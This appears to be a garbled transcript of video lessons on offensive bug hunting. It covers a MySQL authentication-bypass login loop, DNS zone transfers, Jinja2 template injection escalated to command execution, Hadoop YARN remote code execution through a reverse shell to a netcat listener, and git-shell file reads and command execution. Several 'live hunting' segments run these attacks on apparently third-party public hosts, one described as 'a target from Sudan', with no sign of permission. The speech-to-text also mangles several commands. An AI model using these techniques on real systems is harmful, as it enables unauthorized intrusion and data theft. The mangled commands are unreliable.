Hello friends, welcome back. So now I'm going to talk about MySQL authentication by password novelty. So what is the background basically? Let's talk about first that one. Okay. Uh, One of the blog was very famous on Rapid7. It's called Comedic Security Flaw in MySQL. Okay, so you can also read that one. Okay. Comedic security flaw in MySQL, and that is the this is the okay. The tragic comedic security flaw in MySQL. So you can read this for more information about this one. I'm just giving the overview what happened in the background. Okay. So when MariaDB or MySQL server, okay, MariaDB or MySQL is connected, the entered password will be compared to the expected correct password. Okay, password will be compared to the expected correct password. Okay, due to incorrect handling and basically if mem, there is a one function mem cmp, okay, memory comparison, returns a non-zero value, MySQL will assume that the two passwords are the same. Okay, in other words, as long as you know the username, you can bypass authentication. Okay, authentication of SQL database. So basically you cannot just simply try one wrong password and you will be in. No, you have to try multiple times this one. Okay, so for that you can use a command, this one, for I in sequence 1 to 1000. Okay, do, and I'm trying to connect to the server MySQL space -u and the username, then -p and any wrong password you can give. Let's say give blah. Okay, then -h for the host, and you can write in your own machine that /dev/null, just for, otherwise it will just prompt you. Okay, compare. Okay, that's what. So one thing, this will be your complete code. Okay, you can try this. So I'll show you in next video the live example. Hello friends, welcome back. So now I'm going to talk about hunting for MySQL authentication bypassing. Okay, it's a recording. So I have the IP address now 103.12.211.10. I simply installed a MySQL client in my Mac by using apt-get. Okay, you know that. Now, okay, it's not working, no problem. Okay, let me open a new terminal. So I can see there's a MySQL is there. Yes, now MySQL space command will be very easy. MySQL space -s the IP address, let's say 103.12.211.10, and obviously you need a password. So if you're giving -u root, and if you're giving -p a wrong password, it is blah blah blah. Using a password on the command line interface can be insecure. Access denied for the user root. Yes. Now, what if I repeat the same process 1000 times? It may bypass the authentications. Yes. So let's simply replace this IP to my one. Okay, 103.12.211.10. Okay, correct one. Let's try this one. So it's trying using, they're trying wrong multiple times. Okay, say same password. Just wait now. I think yeah, it's correct. Command is correct one. Okay. And what's the IP address I have given over there? Let me check. So 103. Okay, it's correct one. Okay, so now wait. So there is no way, we just have to wait. Okay. Okay. So maybe we can just give a 2 over there for the dev nail. Okay. So it won't so you just error. Okay. It will be directly running the command. Let's try this one. Okay. Now it's continuing. Okay. In background. Okay. Yes. Now you can see we got MySQL. Yes. Now, so this is authentication bypassing vulnerability. Thank you so much. So you can use this command for there. Okay. Thank you so much. Hello friends, welcome back. So now I'm going to talk about live hunting for MySQL authentication bypassing. So I have two targets. Okay, but right now I don't know whether they have MySQL or not. So what I have to do first? Okay, let's exit this one. Okay. Okay, I'll simply, I have a Kali Linux, so I'll simply call that one. Okay. Okay, perfect. Because there is an nmap, so nmap is not in Mac. Okay. Now I'll do nmap space IP address. After that -p and the port number. So let's try 3306, and then after that, first check it's running or not. See, MySQL is there. Now if as capital V, you may get the version details of MySQL. Okay. But right now again, you don't know the passwords of MySQL, but you can try this one. Okay, directly. Okay. So I know this, so I'll simply try this IP address over there, and I'm guessing the username is root. Okay. If you will not give the correct username, you will be not able to bypass the authentication. Okay, make sure this one. Okay, and then don't ask me it's not working. Okay, so you can see we're running this one. Okay, the MySQL is not in the this. Okay, in my Kali. So let me open another terminal, and I will try the same attack over there. Done. It's running. Okay. Now this meantime, I'll try on the different target. The target is this time this one. Okay, 119.203.231.128. So again, I'll do nmap first. Okay, so nmap space IP address -p, port number 3306, and then you can use the first check. Yeah, it's open now. Yes. So let's try this one. Okay, so command we have already just use this command. Okay, done. Now I'll try this later. First I will wait for this one. Okay, it's running, so you can wait this. Okay, you can, I don't have time, I'm just showing you this one. Okay, so wait now. Because it will try 1,000 times. Okay, the authentication, maybe one will work, maybe one. So that's the case. Okay, and again depend on your username. If the username you will provide correct, then it will work, otherwise it won't work. Okay, so I hope you understood the logic. Thank you so much. Hello friends, welcome back. So now I'm going to talk about DNS zone transfer vulnerability. So it's not a big attack. Okay, so forget the misconceptions or forget the myth. It's a big attack, but it may lead to a critical vulnerability related with DNS server. So DNS zone transfer is used to copy a zone file from a master DNS to a slave DNS. You will say, why it's a vulnerability? I can copy from NS1 to NS2. So basically, when a DNS server is misconfigured, not only an authorized slave DNS server can request a copy of the zone file, but anyone asking for GNS zone transfer file will get the received copy. For example, let's say you have a two NS1 and let's say NS2. So obviously, if you want to request a zone file from NS2, obviously you will get, but it's authorized one. Yes, it's authorized one. But why it's when a DNS server misconfigured, not only this slave server will able to request for the file. Any other zone, any other DNS server requesting, any other DNS server requesting for zone file will get. Then there is a misconfiguration. Okay. So basically, in zone transfer, what are the records are over there? In a zone transfer, you will file this kind of records. Let me log into the my leap switch, okay, and I'll show you over there. Okay. In zone transfer, what you will get. Okay. So in the zone transfer, okay, let me search any zone informations. Yeah, DNS zone backups are over there. Zone editor is there. Yes. So you will be able to get information about these are the things. These are the records. Everything you will get from the. Yes. So basically, you are asking the DNS information to give all the information it has given on the domain. Okay. This includes name, addresses, and functionalities of all the servers within a domain. And if you want more information about the domain zone transfer, you can read this post. It's a very popular one, dnszonetransfer.me. And then yes, you can read all information about DNS zone transfer. Now the first things you have to do if you want to identify the vulnerabilities, what you're gonna do? You can use a command, dig space, let's say @8.8.8. You can say Google and then ns you want I want to look up and DNS servers information first of all. So ns space any.com. First things you give this one. So terminal done. Then dig @8.8.8. space ns space I'm giving, let's say hackersera.com. So yeah, I got the information about these are the NS server 4321. Okay, perfect. Now what I will do now, I got the information. So now I will try, let's say dns1.leapswitch.com. I want to attempt a zone transfers on this one. So I'll use copy. Now I'll use a dig whatever. Yes, let's say this one the zone zone. I'm trying to requesting this zone file of hackersera.com from this one. Okay, so let's say hackersera.com. You can see you got the files. Yes, you got the information. That's because it's authorized one. That's why you are able to get this one. Yes. Now, okay, but what if you give something GoDaddy or something? Let's say DNS4. If I'm trying, let's say DNS4, done, perfect. Yes. Now you're able to fire a query. Now I will use what? Now I'll use this one. Sorry, requesting this one with AXFR. Okay, so let's AXFR. I'm trying this one, but you can see it's failed. Transfer failed, so you are not able to transfer. So there is no zone transfer vulnerabilities. Yes. Now, similarly, if you want to try this, let's say vulnerable target is this one, zone transfer.me. Okay. So I'll show you in the next video how to do this on zone transfer.me. Hello friends, welcome back. So now I'm going to talk about DNS zone transfer live attack. So the first things we have to gather about DNS server. Okay. So identify DNS servers for a given domain. So let's say domain is this one, zone transfer.me. So what you're gonna do? Dig @8.8.8.8 space ns, and then you can give the domain, let's say zone transfer.me. So let's try this one. Perfect. So if you're trying this one now, let's try this one. Okay, perfect. Let me run this one. So when I tried, I got the information zone transfer, this one DNSZTM1. Okay, for example, this, and I got DNS information this one. Okay, now now I have to try to, let's say, attempt a zone transfer over there. So you can try with the whole dig command again. So dig space @ this time I will use this one, this NS servers, okay, to transfer their zone. Okay, so let's say @ this one space, you can give AXFRUs to identify attempt to zone transfer, and then a domain name, let's say zone transfer.me. Earlier we have seen if it's not vulnerable, then you will get a transfer failed. Let's try this one. So if I'm trying this now, you can see it's not failed. It gave you all the information about the GNS zone transfer. And if you check, these are the zone. Hi, I Jose O and all his class, zone transfer is provided by Robin Wu, blah blah blah. You got all the information about. You can see there's a SQLi.zone transfer D, and it's a blah. Yes. So yeah, you attempted a zone transfer over there. Yes. So this is vulnerable. Okay. Other ways also you can do. You can use a host command. Okay. So the host command will be this one. If you want to, let's say, host space -t space ns, and then you can give zone transfer.me, and that will throw you one zone transfer information. Let's try this one. You got the information. Yes, you can see these are the name servers. Now if you got the name server, you can also use the host command to attempt to zone transfer. How? It's very easy. In that case, you can use a let's say host space -l domain name, let's say zone transfer.me, and then -l is used for attempt a zone transfer. Okay, and then you can use the DNS server, any DNS server you can use. Let's say this one, for example. Okay, let's try this one. You can see you got all the zone transfer information. Yes, one is there. See 127, or you can use this one okay, with more information. So yeah, zone transfer possible over there. Same thing if you, let's say, host space -t space ls, and then let's say hackerserver.com. If you're trying on hackerserver.com, okay, you got the zone informations. Okay, now let's copy any zone, and then I'll use -l space this one and a space any NS servers. Let's give this one. See, transfer failed. So you understood the vulnerability? Yes. Thank you so much. I hope you enjoyed the sessions. Thank you. Hello friends, welcome back. So now I'm going to talk about Flask Jinja 2 server template injection vulnerability. So basically we'll have a sections on template injection later, but right now I'm talking on RC, so that's why I have to show you Flask Jinja 2 server template injection. So template injections are widely used by web applications to present dynamic data via web pages and emails. Yes, so basically web applications frequently use template system. Yes, template systems may be Twig, FreeMarker, Jinja 2, etc. to embed dynamic content in web pages and emails. Template injection occurs when user input is embedded in a template in an unsafe manner. So basically, how to identify that there is a vulnerability template injection or not? So for that, there are various ways to detect this one, but my favorite one is this one. You can use a template, let's say 7x7, because template can do calculus, so this will be very easy. Or you can use like this one, 7x7, or maybe you can use this one, let's say this one, 7 is not equal to 7, and you will get observe the behavior of the web applications. You can also do something like this one, dollar 7 into 7, and if you'll get output of this one, then there is a vulnerability. Yes, so I have applications. Let's directly jump into that application. So I built one applications. The application, let me check. Okay, before the application, let me show you one report on Uber on the same Jinja 2 RC. Okay, so I think it's hacker1.com/reports/125980. okay, let's do this. So this one was reported on RC by Flash Jinja 2 template injections and got $10,000 bounty for this one. So it's very easy. You can see, you just have to make something like this one. Okay, and if you'll get output, then there is a vulnerability. Okay, if you'll get output of the calculus, then there is a vulnerability. Okay, yes. So now directly jump into the actual part of this one. Okay, so Jinja 2, why Jinja 2? We're focusing on the Jinja 2 first. Okay, Jinja 2 is a full featured template engine for Python. It has full Unicode support and optional integrated sandbox execution environment, widely used and BCD licensed. Okay, so how to detect vulnerability in Jinja 2 framework? So you can use like something like this one. Okay, and you can also use something like this one if you're using, let's say, double curly bracket in the, you can give 7 into 7. We have given, if you result 14, or you can use something like this. If you find 7 times 7, then there's a vulnerability. Or you can put the same thing into double curly bracket. If this is not working, try this in double curly bracket. Okay, or maybe you can try something like this one if you want to read directly a config items. So you can use config.items function. Okay, items, or you can make it in double curly bracket. Okay, if you get output of this, then there is a vulnerability. Yes, so let's try this on. So first, let's say I have applications. The application is okay, you can also try this is domain DNS zone. I have just made a lab, DNS zone lab.hopto.org. okay, let's try this one. So DNS zone lab.hopto.org. okay, perfect. Let's open that. Okay, so it's working on the port number 8000. okay, so 8000. Yes, I got something, hello guest, and I know there is a parameter. You just have to find a parameter. Name is a parameter. Okay, so name, let's give hello. You can see hello is coming. If you'll get, let's say, offensive hunter, it's coming. Okay, perfect. Now I don't know whether they are using Jinja 2 framework or whatever. Yes, let's try template injection there directly. So I'll try something 7 into 7, and you can see you got it just displaying the value. It's not executing this one. So you put in double curly bracket. Okay, now you can see we got the output of 14, and that means there is a template injection. Yes, yeah. So now if there is template injection, so or rather you can use something 7 into 7 as a character like this one. Okay, you get output of 7 times 7. Yes, so it's a vulnerable now. If it's a vulnerable, you can try this config.items and try to get the output. Okay, let's try this one. Okay, so if I'm trying this one, it's just displaying the content, not an issue. Let's put in double curly bracket, and you can see internal server. The server encountered an internal error and was unable to complete your request. The server is overloaded with on your your input. Okay, so what you're gonna do now? You get the eval function and execute the POC. Okay, so get the eval function. So it will work on eval function. Okay, so this is the code. Okay, let me show you. You can use this code to get Jinja 2 exploit Jinja 2 template injection vulnerability into RC. Okay, so there is a pwd command. You can see. Let's try this now. Copy it. I'll simply, because why the percent will work over there, because Jinja 2 can work with Jinja 2 is let's say support Unicode pattern. That's why. Okay, so let's try this one. Okay, let's try remove this one. Done. You can see you got the present working directory. It's the app is a if you want, let's say ID, you can use, let's say ID. Done. Let's try this now. Then you got the ID. Yes, if you want the list, let's say uname, so you can use uname, and let's copy that one. Okay, let's try uname. Okay, so done. You got it. It's a Linux OS. So I hope it's. Hello friends, welcome back. So now again I'm going to talk about exploitation of template injections. So you can use also automated tool. It's a TPL map. Okay, use a TPL map tool. So I already have a TPL map. Okay, PWD. I'm a TPL map directory. You can download from GitHub. Now, so TPL map syntax is, let's say if it's an authenticated, you have to import a cookie. Okay, if it's not authenticated, you don't require any authentication, so you can directly use TPL map space -u and the URL, let's say, okay, like this one. Okay, now let's try this now. Same URL. Let's try this. So I'll copy till name. Perfect. So syntax will be like this now. Okay, Python. If it's not installed, you have to use Python space tplmap.py space -u, and then you can give URL. And if we want to attack on name, so you can give a star over there. Star means the position, you can say. Okay, simple. Let's try this now. So I'm trying this now, and I got to know if you observe the see, get parameter name is injectable, rendering tag star, the vulnerable, see, Jinja 2 plugin testing rendering with tag this one, Jinja 2 plugin had confirmed injection with tag this one. TPL map identified the following injection point name Jinja 2, and the injection is something like this one. Yes, context text, OS is POSIX Linux, render, done. Shell command execution, okay, that means you can execute shell command. Let's try this, os-shell. Okay, so -os-shell, done. You got that. Run commands on the operating system. I want to run ID, pwd, uname, ps. Yes, you got all this. So this is a way to do this. Thank you so much. Hello friends, welcome back. So now I'm going to talk about hunting for Hadoop vulnerabilities. Okay, so let's talk about the Hadoop first of all. Okay, Hadoop is an open source platform. Okay, open source framework that allows for the distributed processing. Okay, processing of large data sets of across clusters of computers. Okay, computers using simple programming models. Okay, so Hadoop, basically Hadoop distributed processing is mostly based on this algorithm, map reduce algorithm. Okay, and I will not go in deep what is map algorithm. You start reading this one, map reduce algorithm. Okay, originally described in 2004 by two Google engineers in order to sort and index web pages. Okay, map reduce algorithms. So what I already talked about simple programming models. What is simple programming models? First of all, users specify a map function that processes a key value pair. Okay, to generate a set of intermediate key value pairs, and reduce function that merge all intermediate and values same intermediate key. Okay, so I will not go in deep again. Okay, now, so let's talk about what a real big data environment look like. Okay, so big data environment will look like this one. Okay, storage, processing, indexation, consultant, administration, security, infrastructure and usage, and there will be cloud era, mapper control, big insight, whatever. Yes, now there's a yarn. Yarn is nothing but it's a resource manager. It's used for scheduling. Okay, and vulnerability maybe you will get either on yarn or either on SDFC. Okay, mostly. Okay, so storage, so SDFC is storage. Okay, in the Hadoop paradigm, every data is sorted in the form of file divided into multiple parts. Yes, like you have seen, multiple parts. Yes, by default the disk size will be 128 MB per part. Okay, replicate in multiple points. So there are two types of node basically you will find. Some data nodes storing actual file paths on the Hadoop distributed file system. Okay, and sometimes you will find a single name node storing a mapping list of file paths, okay, and their data node location. So processing, how it processes the data, basically there are two components. One is MapReduce and other one is yarn. So MapReduce is nothing but being the job distributions algorithm on the cluster. It's a job distribution algorithm on the cluster. Yarn full form is yet another resource negotiator. It's nothing but a task scheduler on the cluster. Okay. So why we are looking vulnerabilities in Hadoop first of all? So basically, all the big companies are using Hadoop. Adobe using 30 nodes, running HDFS, Crateo, eBay, yes, Yahoo have the most number of the Hadoop nodes. Okay. Let's talk about the security model of Hadoop. Okay. So let's talk about the first is authentication. As a CI triangle, you must talk about the authentication. Yes. Authentication. By default, this is a big. By default, there is no authentication mechanism. No authentication mechanism. That means, let's say a company just installed a Hadoop and you got a port number. You open, you will be logged in. Okay. So by default, there is no authentication mechanism is enforced on Hadoop cluster. Okay, that's okay. Hadoop cluster. Mark this one. Or rather, there will be a simple authentication mode used that you can disable. Okay, or else you can bypass. So there should be a proper authentication mechanism. Okay, remediation will be what? Deploy the sole proper authentication mechanism by Hadoop Kerberos cluster. Okay. Now, another is authorization. Okay, authorization model. So every single component of the cluster has its own authorization model. So basically SDFC, SDFS, Hadoop data file. Okay, SDFS supports POSIX. Okay, POSIX permissions without any notion of executable file or set UID or set GID. Okay. Yes. And there is a Hive also. Okay. Hive uses SQL RDBMS. Okay. And SQL verbs. Now, also some third-party components have to be deployed centrally, like manage policies and audit traces like Apache Ranger, Sentry, etc. Okay. So what about Hadoop security model for data protection in transit? Data protection in transit. Okay, in transit. Again, there is no encryptions. Okay, there is no encryption is applied on data by default. I'm talking about the by default. Okay, so you can test, retest, and if you get encrypted, then it's a secure. Otherwise, it's not secure. Okay. Now, what are the things you should look for the Hadoop vulnerabilities? What are the first is called name node. Let's talk what are the name node. So these are the name node. First is called SDFS metadata. Okay, metadata, and that you will mostly find on 8020 port. Okay, there is a yarn job submission. Okay, this is a yarn model. Yarn means resource manager. Okay, yarn job submission. Okay, and that mostly working on 8030 port. There is a SDFS name node. Okay, web UI. Okay, web GUI, web interface, and that you will find on 5007 port. Okay, or on this port 470 port. As well as the MapReduce algorithms, you will get a job history of MapReduce server web UI interface on this port. It's a 19888, or maybe it will be on 19890. It's called MapReduce job history web GUI. Okay, web GUI. Now the importance is this one, 8088. It's completely a task scheduler, and it's working, or sometimes it's work on 8090, and it's a Yarn resource manager. Okay, Yarn resource manager, web UI. So they are all different nodes, and I'm not going to talk about everything. Okay, as well as few third-party module services will be there, like HTTP, FS, Cloudera, Apache Embury, Apache Ranger, like this one. Okay, Apache Embury, Apache Ranger. These are the third-party module services. OGO Web Console, Cloudera. So you have to find all the services first of all on the Hadoop cluster. If you got to know all the services, then you will be able to find anything, anything interesting over there. So we have an Nmap module for this one. So I'm just talking about the Nmap module. So we'll talk about next one. Thank you so much. This is all about the background concept. Hello friends, welcome back. So now I'm going to talk about Nmap. You have to use Nmap for Hadoop hunting. You have to recon first of all Hadoop cluster. Yes. So how to do recon for Hadoop clusters, whether Hadoop clusters are there or not, what are the data node, what are the job trackers, what are the name node, what are the secondary name node, what are the task trackers. So you have to gather all the information about this one. So it's very easy. Nmap -upon script. After a script, you have to use Hadoop dash data node dash info space the IP address. Now, so this will give you the data node informations. There is name node also. So name node. There is a job tracker. If you want to find a job trackers, so job tracker. What are the job running? What are the scheduling process are running into? Now, if you want to talk about secondary node information, so secondary name node. So you have to use Hadoop dash secondary dash name node. This one. Now if you want to all about task tracker info, same thing, you just have to use there task tracker info. So this one novelty will be only able to find when there is a Hadoop cluster. Otherwise you won't get anything. So this is all the Nmap commands. You should remember this one. Whenever you're doing recon, that's it. Only this 4 to 5 commands. For Hadoop hunting. And now we'll talk about the hunting. Live hunting, you can say. Hello friends, welcome back. So now I'm going to talk about hunting for Hadoop. So I have a target. So the target IP address is this one, 192.168.31.76. Let's do this. Now I have to first fingerprint all the information recon. So I have this one, so I'll just replace with IP address with this one, 192.168.31.76. Let me do this. So I'm just trying for now data node. Let's try this one. So I'm looking for data node info right now. Just wait. So it may take time. Again, Nmap is depend on many things. So wait. So I hope the IP address is running. Let me check it's running or not. So 192.168.31.76, and so its port will be 8088. So you can see the Hadoop cluster is running, and cluster nodes, active nodes is 1. Now if I'm clicking on the new apps, new saving, nothing, submitted, I'm not getting anything, accepted, nothing, running, perfect, finished, failed, killed. And these are the schedulers. So you want to gather all the information, cluster seeds, used, capacity, max, everything is there. So I'm not teaching you the Hadoop how to deploy Hadoop cluster, etc. I'm trying to find the bugs on this one. Okay, so you can see there is no authentication. The first thing, by default there is no authentication. I'm logged in. Okay, you got this. This is a vulnerability. Report it. Okay, like this one. Now I'm trying to find the Hadoop cluster data node. Okay, and you can see only 8088 port open. Okay, we are not getting too much data information. So only HTTP. That's nothing. Okay, let's try name node. Okay, so I'm trying on name node informations. Name node info. Okay, let's try this now. Wait, we have to wait. There's nothing I can do. Okay. So yes, we have to wait. There is nothing we can do. Okay, running, running. We have to wait. There's nothing we can do. Yes. Okay, it's taking time. So maybe we'll get something interesting. I hope so. Till then, let me check it's running or not. Okay. So it's running. Yes. And there is nothing that we haven't got. Okay. If it will take time, I will pause this and I'll come into the next video. Okay. Thank you. Let me check. Just wait for a few more seconds. Okay. Okay, not got anything. No, so we haven't got anything. Okay. Okay, so I'll do one thing now. Okay. Okay, let me simply. Okay, it's run. Okay, okay. I see name node information. We got to know there's nothing. Okay. So okay, not an issue. Okay, we got one thing. Okay, that's it. Okay, now I'll show you the different thing in next video. Thank you so much. We haven't got so much information about this one. We just got to know 8088 port is running. Okay, that's it. Thank you so much. Hello friends, welcome back. So now I'm going to talk about browsing the SDFS data leak. Important again, yes, because you can see SDFS is a database. Okay, cluster data. Yes. Now, so basically, Web SDFS offers REST API for users to access data on SDFC file systems using the HTTP protocol. Okay. Now, by default, if server's authentication is not enabled, no credential is needed to request this service. Only user identification is needed using the user.name parameter. Okay. So Web SDFC API are exposed on the following service. Okay. The Web SDFS will be exposed on port number 50075 that I already talked about this. It's a SDFS data node web UI. Okay. So you will find this on 50075 port. And if they are using third party HTTPFS module, then it will work on 14,000 port. Okay. So again, you have to do nmap first of all. So if I'm doing nmap, let's say nmap space -p, port number is 50075 and I'm using IP address directly. Let's say 192.168.31.76. Okay. So you can see it's closed. That means there is no web SDFS API. Okay. There is no data node web UI. Assume it's open. Okay. Assume it's open. What are you going to do now? Your goal will be to get SDFC file systems. So for that, there is one tool called SDFS browser. Okay. .py. Okay. You need this file. I'll share you later. Okay. So SDFS browser has been developed to allow attackers to easily browse the SDFS file system using Web SDFS and HTTPFS service. Okay. So I have this file. You can see I have this file over there, SDFS browser.py. I'll simply run this file, Python space this file, and you can see I got, okay, you just have to give the host name over there. Okay. So host name, and let's say 192.168.31.76, and there is no service running. That's why we haven't got any data. Okay. If there will be any service running, you will get data. Okay. That's it. This was one. Okay. Yes. Now we'll talk about getting the target environment configurations. If you want to know about the target environment configurations, so for that, let me do this. Okay. Okay. So if you want to, let's say, know about target environment configurations, so basically several cluster parameters have to be configured in different files on the client side to be able to interact with the Hadoop cluster. Yes. So there may be multiple web interfaces, 8088 for data node, 8020, whatever. Yes. So if you want to know about all the configurations, you can use this tool. Okay. It's called a Hadoop Snooper. Okay. So now we'll talk about the Hadoop Snooper. Okay. Hadoop Snooper has been developed to allow attackers to easily retrieve a suitable minimum client-side configuration details. Okay, so you can use this command. let's talk about this one. So I have another Hadoop snooper, so I'll use Python space Hadoop snooper and the host name 192.168.31.76. Let's try this now. Does not exist. Do you want to create it? Yes, create it. Okay. so the requirement of this tool is you need XML module. Okay, LXML module. Okay. Okay, so let me try pip space install space LXML. Okay. Okay, LXML is there. Done. But okay. Now let me run this Hadoop snooper. Yes. So core site XML created already, map site created already, but there is some problem. Okay, not an issue. Let me do this cat, and if I done ls, okay, cd Hadoop snooper, there is cat core. Okay, so we haven't got anything there. Cat, we haven't. Okay, map reduce is there. Okay, on the port number, job history address is this one 10020, and there's running map and yarn is there. Okay. Okay, perfectly. So we got something. Okay, now, so map reduce job history. The IP and the port of job history are used to track jobs. Okay, so it's running on 10020 to track jobs. That's it. Okay, there's nothing. Okay, extra we haven't got. Now we'll talk about executing remote commands that we'll see in the next video. Okay, thank you so much. Hello friends, welcome back. So now I'm going to talk about executing remote commands. Okay, on Hadoop clusters. You can say Hadoop RC in simple language. So now I'm going to talk about this one. Okay, so I have an environment. It's running on this one. If you want, I will make it live, and you can also practice this one. Okay, 192.168.31.76. So I have a exploit code. Okay, so let me simply do cat space exploit.py. Okay, so you can see requesting target IP address. Okay, so I'm just editing nano space. I'm attacking on the yarn first of all. Okay, so I'll give this one running platform for yarn 192.168.31.76. okay, lhost, we can put lhost. Okay, so right now I have both the same applications. So basically what they are doing is creating a new application ID taking by default cluster applications, and application ID is app ID get cell, and I'm writing a command, this one bin bash -i and port number 9999. You can change the port number, so let me change the port number. Okay, or let it 999. Okay, let's save this. Perfect. So I'll do what now? I'll again I need again this one SSH offensive hunter @31.76. okay, so I have to start a netcat. So mc space -lvp 9999. I started listening on port number 9999. okay, now I have explorer.py. I'll simply run this python space explorer.py. You can see I just run that, and maybe that executed bin bash in the background, and you will get, see, no job control in the cell, and you received connection from this IP address 41564 received. And if you do ID, you are the root user now. If you do ls, these are the files over there, pwd. You are in the container, yes, Hadoop cluster, yes, temporary, yes, but you are a root user, yes. So uname, it's a Linux, okay, cat /etc/passwd, you'll get all the users informations, everything. So it's a executing remote code executions and Hadoop clusters. Thank you. Hello friends, welcome back. So now I'm going to talk about live hunting Hadoop. Okay, so I found a target from Sudan. Okay, so the target is this one. I just used port number 50070, and I got the target this one. Okay, you can see 192.317 files. Okay, so I got the IP address. It's a 164.52. Let me note it down. 164.52. okay, dot 192.51. okay, it's a 51. okay, so you can either try nmap, you know the concept. Yes, let's try. So I have this one, let me use Okay, you know the nmap syntax? Yes. Okay, just jump into the nmap things. Okay, so nmap name node, I want, let's say, name node informations. Okay, so let's, you know, yes, how to recon you, I have already talked about this one. Okay, so right now I want going to talk about this one. Okay, just wait. You want to get information about third parties, name node, data node, everything you'll get through this one. Okay, so wait now. After this you also got to know that we have a cd slash, okay, we have one sdfs browser.py that will get cluster sdfs information, yes, data leak. Okay, so python space sdfs browser.py and then IP address, you can give this one, and you can see service web SDFS is enabled, and there is no authentication. If there is no authentication, you will retrieve some services. That's it. This is a vulnerability reported. That's it. Okay. Now go back. Let's try this one. Just wait. Okay. Just wait. It's running. It's running. Everything is running. You have to wait. Patience and determination will lead you to succeed. Okay. Yes. Okay. You got to know. See this. There is no HTTPS, but we retrieve root user this one, and we got to tuning. Okay, so these are the data leaks. Okay, these are the leak. Okay, thank you. Now just wait, it's running. Wait, and you can also try this exploit pipe. So cd slash root. Okay, okay, done. Okay, sudo space -s. I have to make myself root first of all. Okay, done. I have a file over there. It's exploit.py. So in this, I will just replace this one target, and then lhost should be publicly, okay, public IP address. Okay, and then you will get a remote code executions. So you can see 8088 port is working or not. It's working. Yes, cluster is there. You can simply go there, new. Yes, 8 submitted applications. Yes, you can also submit your applications there. There is no authentication, so you will get a remote code executions. Now, what about the different ports, different third-party ports working or not? 180, it's not there. Okay, so you can again do nmap. Okay, you will get all the information about data nodes, name nodes, everything over there. Okay, yes, so we got to know there 8088 port is there, 8040 is 42 name node. These are the name node. Okay, VNC. Okay, what about data node? So if you want to talk about data node, you just have to use this one, data node. Okay, and you may get data node informations. Okay, so again there is no data node 2. Okay, now if you want to talk about job trackers, task trackers, you can use this one. Okay, so thank you so much. Hello friends, now I'm going to talk about git cell bypass. Okay, so git cell is a restricted cell. Git cell is a restricted cell maintained by the git developer. Okay, git developers, and is meant to be used as the upstream peer in a git remote session over a SSH tunnel. Okay, so basically the basic idea behind the cell is to restrict the allowed commands. Okay, allowed commands in a SSH session to the ones required by git. Okay, so restrict cell is to restrict the allowed commands. Okay, restrict the allowed command required by git, which are as follows. So there are few git dash receive dash pack. What does this basically? receive repository updates from clients. Okay, so this is used for receive repo updates from clients. Okay, clients. There is another called git upload pack. Okay, this is used for push repo updates to the client. Okay, to the client. There is one more, it's a git dash upload dash archive. Okay, this is nothing but push repo archive to the client. Okay, to the client. So besides those built-in commands, an administrator can also provide its own commands. That's okay. Administrator can also provide its own commands via shell scripts or other executable files. Now, if you are familiar with Git, you will maybe know that most of the servers encapsulate the Git protocol inside additional protocol like SSH or HTTP. Okay, so most of the servers encapsulate the Git protocol to SSH or HTTP. That's because the Git protocol itself, it's a simple text-based protocol, does not provide any authentication or protection mechanism for data transfer. Okay, that means we will be able to fetch etc/password and there will be no authentications. Okay, and normal SSH is provide multiple authentication mechanism, stable encryptions, low protocol. So Git, this is a vulnerability in Git SSH. Okay, now so this is all about the background concept. Next we'll see the hunting. Okay, hello friends, just assume you got a Git cell in a target applications. Okay, what you gonna do? Your goal to be read arbitrary file reads and possibly arbitrary command execution in target application. So I have a target application. Okay, 31.76. This is the target applications. Now first I will do nmap. Okay, because I don't know the port number. So nmap, and I'm running on this port number. It's a -3322. Okay, so 3322. I'm running SSH on this port number, Git cell port. Okay, for demo purpose. Okay, 192.168.30.76. Perfect. And you can see SSH is there, but it's a filtered. Yes, no issue. Okay, now SSH is there. Let me try to connect SSH space -p. I'm using port number 3322 space git @192.168.31.76. asking for password. I don't know the password. It won't connect. Yes. Now I have an authorization private key. Okay, to connect. This is a lab, so I have authorization key also. Okay, for the connections. Okay, so I will use SSH space -p 3322. It's for this lab. Okay, in real world you don't need the private key. Okay, so this is a private key of SSH port. Let's say, so I have a -i. I'm giving input ID_RSA. This is the private key I have for this lab. Okay, now Git is the username. I'm trying to connect Git @192.168.31.76. Connection refused, fatal, unrecognized commands. Okay, so I tried normal connection to its SSH services. Okay, but an error returned and the connection closed. Yes, not an issue. Now I will try to take a help. Okay, so if I will use -help, you will get help of your SSH. Okay, not the interactive intercepted Git shell help. Okay, I want the Git shell help. Okay, so what I will use now, I will try to use a commands. So commands here, git space upload space git upload space archive. Okay, that we have seen that. Yes, it's git that upload that archive. And if you want, if you directly give help, again this will show you your SSH help. Okay, not the interactive git shell help. Okay, so there's a bad argument why this is coming. Okay, id underscore RSA is there, git at the rate IP address is there. Okay, and I'm using git dash upload dash archive. Let me zoom out a little bit. Okay, so if I'm trying this one now, it's showing me error. Okay, port number is -P3322. Okay, perfect. Okay, let me try now one more time. Okay, so 3322 port number is there, and I'll not type ID. Okay, just ID RSA is there perfectly. Git at the rate 192.168.31.76 and space double quote git dash upload dash archive. Okay, archive. Let me enter. Bad argument. It's saying bad argument. I don't know why it's happening. Hyphen help. Let's try. Bad argument. Okay, so I tried to connect, but it's saying bad argument, not an issue. Now what I will do, I'll do help in, I will take help of this git upload archive from git shell. Okay, so hyphen help. Okay, if I'm trying this now, yes, you got the help git upload archive help, and you can see send archive back to git archive. Okay, now I want this to execute on the git shell. Okay, so I will use -T over there. Okay, the target -T. Let's enter this. Now you can see we got the git upload archive, manually paste git upload archive. Okay, now if you want to press H for help, let's say if you want to read any files, it's called arbitrary read files, you have to use Shift E to read. Shift E, you can see now I can read any file. So I want to read /etc/pass/wd. You can see you got the etc pass. Okay, so I hope it's clear to you. Thank you so much. Hello friends, now I'm going to talk about git shell command executions. So we just have seen, yes, the arbitrary file read through git shell. Yes, now we'll talk about this one, executing command executions on git shell. So for that, it's very easy. Again, we'll try to connect back. Okay, so let me queue. So we'll try again SSH-P port number. If there is a private key, you have to use -I ID RSA -T for target git, and git upload archive --help. Okay, let's try enter. Now if you want to execute any command in the git shell, you have to use this one. Okay, so you have to use this one, exclamatory and ID. That's it. Okay, so let's try this now. So I'll use exclamatory and ID. You can see you got the output. If you want, let's say pwd, you are in which directory? You are in the git directory. Yes, see, if you want, let's say what, ls, so these are the files over there. No files. Yes, that's why that's only git. Thank you so much. Hello friends, welcome back. So now I'm going to talk about Redis unauthorized access vulnerability. So before jumping to the Redis, let's talk about the Redis. What is Redis? Redis is an open source in memory data structure storage used as database. Okay, used as database, cache and message broker. Okay, yes, 